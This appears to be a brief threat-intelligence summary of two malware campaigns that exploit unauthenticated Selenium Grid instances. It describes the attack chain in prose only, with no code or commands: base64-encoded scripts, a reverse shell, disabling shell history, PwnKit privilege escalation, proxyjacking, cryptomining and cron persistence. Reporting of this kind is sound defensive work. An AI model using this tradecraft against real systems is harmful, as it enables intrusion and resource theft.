Cado Security Labs discovered two campaigns exploiting misconfigured Selenium Grid instances to deploy malware, including an exploit kit, cryptominer, and proxyjacker. Selenium Grid is widely used for browser automation and testing, but its default configuration lacks authentication, making it vulnerable. The campaigns involved using base64-encoded scripts to execute malicious payloads like GSocket reverse shell, IPRoyal proxyjacking, and cryptomining malware.
The first campaign exploited the lack of authentication in Selenium Grid to inject a base64-encoded Python script. The script executed a payload that set the HISTFILE variable to disable shell command history logging, downloaded and executed a reverse shell script, and installed a second script named "pl." This script performed system checks, stopped Docker containers, installed proxyjacking tools like IPRoyal Pawns, and set up the environment for further exploitation. It also included a base64-encoded script to install Docker if not already running and retrieved Traffmonetizer and WatchTower Docker images.
The second campaign also used base64-encoded scripts for malicious activity. The Python script revealed a bash script that downloaded an ELF binary packed with UPX and executed it after checking the system's architecture. The binary used the PwnKit exploit to escalate privileges, connected to Tor nodes for command and control, and deployed a cryptominer and a shell script compiler (SHC) compiled ELF binary named "top." The campaign utilized various techniques like UPX packing to evade detection and establish persistence using cron jobs.